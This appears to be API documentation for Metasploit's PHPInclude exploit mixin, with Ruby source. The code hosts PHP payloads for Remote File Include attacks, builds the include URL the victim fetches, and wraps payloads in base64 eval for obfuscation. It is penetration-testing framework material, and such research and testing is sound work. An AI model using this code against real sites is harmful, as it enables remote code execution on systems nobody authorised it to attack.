Module: Msf::Exploit::Remote::HttpServer::PHPInclude

Includes:
Msf::Exploit::Remote::HttpServer
Defined in:
lib/msf/core/exploit/http/server/php_include.rb

Overview

This module provides methods for exploiting PHP scripts by acting as an HTTP server hosting the payload for Remote File Include vulnerabilities.

Instance Attribute Summary

Attributes included from SocketServer

#service

Instance Method Summary collapse

Methods included from Msf::Exploit::Remote::HttpServer

#add_resource, #add_robots_resource, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #start_service, #use_zlib

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from TcpServer

#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #start_service

Methods included from SocketServer

#_determine_server_comm, #cleanup, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #start_service, #stop_service, #via_string_for_ip

Instance Method Details

#autofilterObject

Since these types of vulns are Stance::Aggressive, override HttpServer's normal non-automatic behaviour and allow things to run us automatically


28
29
30
# File 'lib/msf/core/exploit/http/server/php_include.rb', line 28

def autofilter
  true
end

#exploitObject

:category: Exploit::Remote::TcpServer overrides

Override exploit() to handle service start/stop

Disables SSL for the service since we always want to serve our evil PHP files from a non-ssl server. There are two reasons for this:

  1. https is only supported on PHP versions after 4.3.0 and only if the OpenSSL extension is compiled in, a non-default configuration on most systems

  2. somewhat less importantly, the SSL option would conflict with the option for our client connecting to the vulnerable server


45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# File 'lib/msf/core/exploit/http/server/php_include.rb', line 45

def exploit
  old_ssl = datastore["SSL"]
  datastore["SSL"] = false
  start_service
  datastore["SSL"] = old_ssl

  #if (datastore["SRVHOST"] == "0.0.0.0" and Rex::Socket.is_internal?(srvhost_addr))
  #	print_error("Warning: the URL used for the include might be wrong!")
  #	print_error("If the target system can route to #{srvhost_addr} it")
  #	print_error("is safe to ignore this warning. If not, try using a")
  #	print_error("reverse payload instead of bind.")
  #end

  begin
    print_status("PHP include server started.");
    php_exploit
    ::IO.select(nil, nil, nil, 5)
  rescue ::Interrupt
    raise $!
  ensure
    stop_service
  end
end

#initialize(info = {}) ⇒ Object


14
15
16
17
18
19
20
21
22
23
24
# File 'lib/msf/core/exploit/http/server/php_include.rb', line 14

def initialize(info = {})

  # Override TCPServer's stance of passive
  super(update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive))

  register_evasion_options(
    [
      OptEnum.new('PHP::Encode', [false, 'Enable PHP code obfuscation', 'none', ['none', 'base64']]),
    ], Exploit::Remote::HttpServer::PHPInclude
  )
end

#on_request_uri(cli, request, headers = {}) ⇒ Object

:category: Event Handlers

Handle an incoming PHP code request


89
90
91
92
93
94
95
# File 'lib/msf/core/exploit/http/server/php_include.rb', line 89

def on_request_uri(cli, request, headers={})
  # Re-generate the payload
  return if ((p = regenerate_payload(cli)) == nil)

  # Send it to the application
  send_php_payload(cli, p.encoded, headers)
end

#php_include_url(sock = nil) ⇒ String

The PHP include URL (pre-encoded)

Does not take SSL into account. For the reasoning behind this, see #exploit.

Returns:

  • (String)

    The URL to be used as the argument in a call to require, require_once, or include or include_once in a vulnerable PHP app.


106
107
108
109
110
111
112
# File 'lib/msf/core/exploit/http/server/php_include.rb', line 106

def php_include_url(sock=nil)
  host = srvhost_addr
  if Rex::Socket.is_ipv6?(host)
    host = "[#{host}]"
  end
  "http://#{host}:#{datastore['SRVPORT']}#{get_resource()}?"
end

#send_php_payload(cli, body, headers = {}) ⇒ Object

Transmits a PHP payload to the web application


72
73
74
75
76
77
78
79
80
81
82
# File 'lib/msf/core/exploit/http/server/php_include.rb', line 72

def send_php_payload(cli, body, headers = {})

  case datastore['PHP::Encode']
  when 'base64'
    body = "<?php eval(base64_decode('#{Rex::Text.encode_base64(body)}'));?>"
  when 'none'
    body = "<?php #{body} ?>"
  end

  send_response(cli, body, headers)
end